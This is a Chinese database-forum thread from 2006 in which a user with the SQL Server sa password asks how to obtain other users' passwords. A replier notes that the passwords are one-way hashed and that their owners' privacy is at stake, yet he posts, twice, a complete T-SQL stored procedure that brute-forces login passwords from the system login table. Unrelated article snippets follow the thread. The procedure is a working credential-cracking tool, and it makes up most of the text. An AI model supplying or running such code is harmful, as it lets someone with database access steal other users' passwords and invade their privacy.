微信扫一扫2.1w+
社区成员
已经知道了一个数据库的sa密码,如何获得其它用户的用户名和密码?
已经知道了一个数据库的sa密码,如何获得其它用户的用户名和密码?
或者知道其他用户名,如何获得其密码?
或者知道其他用户名,如何获得其密码?
...全文
当前发帖距今超过3年,不再开放新的回复
发表回复
dpbug 2006-03-19
这样阿,那还真不好办了
- 打赏
- 举报
zjcxc 2006-03-19
前面已经说过了, 密码是单向加密的, 不能破解.
你是合法用户, 管理员, 也无权获取别人的密码, 因为这具密码可能会涉及到别人的隐私, 甚至通过这个密码能猜测到别人的其他东西(例如卡号)的密码
你是合法用户, 管理员, 也无权获取别人的密码, 因为这具密码可能会涉及到别人的隐私, 甚至通过这个密码能猜测到别人的其他东西(例如卡号)的密码
- 打赏
- 举报
dpbug 2006-03-19
能不能直接获得,我是合法用户,管理员,不想破解
- 打赏
- 举报
zjcxc 2006-03-19
== 可以暴力破解
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO
/*--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII
理论上可以破解任意位数的密码,一般的电脑都可以破解3位密码
条件是你的电脑配置足够,时间足够
--邹建 2004.08(引用请保留此信息)--*/
/*--调用示例
--测试特殊字符
declare @pwd sysname
set @pwd=char(0)+'a '
exec sp_password null,@pwd,'sa'
exec p_GetPassword
--测试带空格的密码
exec sp_password null,'a ','sa'
exec p_GetPassword
--测试中文
exec sp_password null,'我 ','sa'
exec p_GetPassword
--清除密码
exec sp_password null,null,'sa'
--*/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=3 --密码破解的位数,默认只破解3位及以下的密码
as
--生成要破解的密码的用户表
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null or datalength(password)<46
then 1 else 0 end
,pwdstr=case when datalength(password)<46
then cast(password as sysname)
else cast('' as sysname) end
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
--生成临时表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint PK_#t primary key(id)
--清理不需要的字符
if not exists(select 1 from #pwd where type=1)
delete from #t where id between 65 and 90 or id between 129 and 254
--密码破解处理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)
--破解1位密码
select @l=0
,@s1='id=a.id'
,@s2='#t a'
,@s3='char(b.id)'
,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#t b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
--破解超过2位的密码
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
select @l=@l+1
,@s1=@s1+',id'+cast(@l as varchar)
+'='+char(@l/26+97)+char(@l%26+97)+'.id'
,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
exec('
select '+@s1+' into #tt from '+@s2+'
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#tt b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
end
--显示破解的密码
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[p_GetPassword]
GO
/*--穷举法破解 SQL Server 用户密码
可以破解中文,特殊字符,字符+尾随空格的密码
为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII
理论上可以破解任意位数的密码,一般的电脑都可以破解3位密码
条件是你的电脑配置足够,时间足够
--邹建 2004.08(引用请保留此信息)--*/
/*--调用示例
--测试特殊字符
declare @pwd sysname
set @pwd=char(0)+'a '
exec sp_password null,@pwd,'sa'
exec p_GetPassword
--测试带空格的密码
exec sp_password null,'a ','sa'
exec p_GetPassword
--测试中文
exec sp_password null,'我 ','sa'
exec p_GetPassword
--清除密码
exec sp_password null,null,'sa'
--*/
create proc p_GetPassword
@username sysname=null, --用户名,如果不指定,则列出所有用户
@pwdlen int=3 --密码破解的位数,默认只破解3位及以下的密码
as
--生成要破解的密码的用户表
select name,password
,type=case when xstatus&2048=2048 then 1 else 0 end
,jm=case when password is null or datalength(password)<46
then 1 else 0 end
,pwdstr=case when datalength(password)<46
then cast(password as sysname)
else cast('' as sysname) end
,pwd=cast('' as varchar(8000))
into #pwd
from master.dbo.sysxlogins a
where srvid is null
and name=isnull(@username,name)
--生成临时表
select top 255 id=identity(int,0,1) into #t from sysobjects a,sysobjects b
alter table #t add constraint PK_#t primary key(id)
--清理不需要的字符
if not exists(select 1 from #pwd where type=1)
delete from #t where id between 65 and 90 or id between 129 and 254
--密码破解处理
declare @l int
declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000),@s4 varchar(8000)
--破解1位密码
select @l=0
,@s1='id=a.id'
,@s2='#t a'
,@s3='char(b.id)'
,@s4='cast(b.id as varchar)'
exec('
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#t b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
--破解超过2位的密码
while exists(select 1 from #pwd where jm=0 and @l<@pwdlen-1)
begin
select @l=@l+1
,@s1=@s1+',id'+cast(@l as varchar)
+'='+char(@l/26+97)+char(@l%26+97)+'.id'
,@s2=@s2+',#t '+char(@l/26+97)+char(@l%26+97)
,@s3=@s3+'+char(b.id'+cast(@l as varchar)+')'
,@s4=@s4+'+'',''+cast(b.id'+cast(@l as varchar)+' as varchar)'
exec('
select '+@s1+' into #tt from '+@s2+'
update pwd set jm=1,pwdstr='+@s3+'
,pwd='+@s4+'
from #pwd pwd,#tt b
where pwd.jm=0
and pwdcompare('+@s3+',pwd.password,pwd.type)=1
')
end
--显示破解的密码
select 用户名=name,密码=pwdstr,密码ASCII=pwd
from #pwd
go
- 打赏
- 举报
zjcxc 2006-03-19
sql的密码是单向加密, 不可逆的, 因此, 你无法获取其他用户的密码.
不过, 用sa的用户可以修改所有其他用户的密码:
sp_password null,'新密码','用户名'
不过, 用sa的用户可以修改所有其他用户的密码:
sp_password null,'新密码','用户名'
- 打赏
- 举报
实验1答案 - 建立学生数据库.sql 如选择“混合模式(SQL Server身份验证和Windows身份验证)”表示除了可以用使用登录到Windows的帐号作为登录的依据外,还可以使用SQL Server系统的帐号登录,这里必须为内置SQL Server系统管理员账户(SA)提供一个...
阿里云 mysql 修改root密码修改_怎样修改数据库root密码 在 Linux 中修改 MySQL 或 MariaDB ...其中的一个设置是数据库的 root 密码 —— 该密码必须保密,并且只在必要的时候使用。如果你需要修改它(例如,当数据库管理员换了人 —— 或者被解雇了!...文章知与谁同2017-0...
【SQL Server】用户的设置与授权、sa用户登录、查询一个数据库中有多少张表 SQL Server用户的设置与授权除了将不同的数据库开放给不同的用户以外,还有一个就是提供一个通道给其它程序访问,毕竟直接使用Windows身份验证有点不太专业。 在实验之前,我们先设置两个数据库,一个test还有一个是...
python3 连接SQLserver2014(包括用户名和密码设置) 使用python3 连接SQL server2014今天下午刚好有人请教怎么使用python3 连接SQLserver,虽然自己之前都是用MySQL,但是觉得估计也没有多大的问题,于是就答应下来了,前后花了一个小时左右吧,但是大部分的时间都用在...
mysql如何创建sa_怎样建立一个数据库 问题标题怎样建立一个数据库2017-9-22来自ip:13.185.18.81的网友咨询浏览量:127问题补充:相关问题:网友答案问题一:怎样建立一个简单数据库?把excel导入数据库,不出现表格嵌套可以使用下面这个方法导入;思路:(1...
PHP mongodb 权限,MongoDB权限管理之用户名和密码的操作 MongoDB权限管理之用户名和密码的操作 MongoDB已经使用很长一段时间了,基于MongoDB的数据存储也一直没有使用到权限访问(MongoDB默认设置为无权限访问限制),今天特地花了一点时间研究了一下,研究成果如下: 注:...
为SQL数据库创建登录名和密码 为了保证数据库的安全性,需要为数据库创建一个登录帐号,通常每个数据库都有一个默认登录帐号sa,该帐号具有最高的管理权限,但是建议最好重新创建一个新帐号,这样不容易让访客知道,能够使数据库变得更安全。...
怎么修改管家婆服务器密码忘记,管家婆操作员密码找回教程.doc 管家婆操作员密码在SQL中找回及查询脚本制作图解教程管家婆辉煌2008++其它版本原理一样,自己摸索!!!一:找回密码:交流! e2 y, W( t4 }1:打开SQL企业管理器,详细见图:\8 O0 c5 L1 c a/ tSnap1.jpg (77.49 KB)...
sqlsever数据库用户管理 在SQL Server中,用户和角色都是分为服务器级别和数据库级别的。 2. 服务器级别 2.1 服务器级用户(即:登录名) 服务器级别下的登录名是指:有权限登录到某个SQL Server服务器的用户。 例如:超级管理员的登录名是...
SQL SERVER 2000更改Sa用户名和密码 在北大青鸟于海涛的教程中时常出sqlconnection con=new SqlConnection("server=.;database=nowerth;uid=sa;pwd="); 这样的数据库连接。对于此连接有两点儿不安全...对于Sa这个保留用户, 大家一定要足够的小心,...
显示数据库服务器上的数据库数据库,sql server 2012 现在指定用户访问自己固定的数据库,其它数据库不显示... sql server 默认创建登录用户,成功登录后会显示其它所有的数据库名称,虽然,点击相关名称,访问不了,只能访问自己的数据库,但是看起来不舒服,因为假如一个服务器上有多个数据库,那数据库名称字就会全部显示...
SQL Server 登录名、服务器角色、用户名和数据库角色 --- 解释 比如说Server这个服务器有4个数据库,DB1,DB2,DB3,DB4,每个数据库都有一个用户USER1,USER2,USER3,USER,在创建一个登录名my的时候可以通过用户映射的操作,为这个登录名在每一个具体的数据库中指定用户,比如...
速达登录服务器密码如何修改,登录速达软件口令忘记了进不去怎么弄 1。修改操作员密码。如忘记了操作员密码,不管做何种操作,管理员必须做好备份,将所有帐套备份下来,以备今后重新安装...修改SQLServer数据库sa密码。用Windows登录方式进入SQL数据库,打开SQLServer的企业管理器,...
数据库 实验一 建立环境实验和数据库/表 建立环境实验和数据库/表 实验学时:2学时 实验类型:验证 实验要求:必修 一、实验目的 通过本实验的学习,使学生熟悉SQL Server 2014的集成环境,帮助学生掌握数据库、表的建立方法以及SQL Server的数据导入...
java项目连接jboss中数据库_在JBoss中配置多个数据库和数据源 本文作者Marcus Zarra分析了如何在JBoss中配置多个数据库以及数据源。配置数据源JBoss的默认安装过程总共有三种配置选项:所有的(all)、默认的(default)和最小的(minimal)。如果你第一次启动JBoss服务器的时候没有...
实验二——数据库安全性定义与检查 数据库安全性定义与检查一、 实验题目二、 实验内容和要求三、 实验步骤(一) 自主...定义用户、角色,分配权限给用户、角色,回收权限,以相应的用户名登录数据库验证权限分配是否正确。选择一个应用场景,使用自主
java连接sql数据库_java如何连接sql数据库? ,前两个是属于数据库软件,正常安装即可(注意数据库登陆不要使用windows验证) <1> 将JDBC解压缩到任意位置,比如解压到C盘program files下面,并在安装目录里找到sqljdbc.jar文件,得到其路径开始配置环境变量 在环境...
sql server登录名、服务器角色、数据库用户、数据库角色、架构区别联系** 1.一个数据库用户可以对应多个架构(架构是表容器)。架构里面包含的是数据库表。 2.一个数据库角色有可能涉及多个架构。数据库角色对应的是权限。 3.一个用户对应一个数据库角色。 4.登录名与数据库用户在服务器...
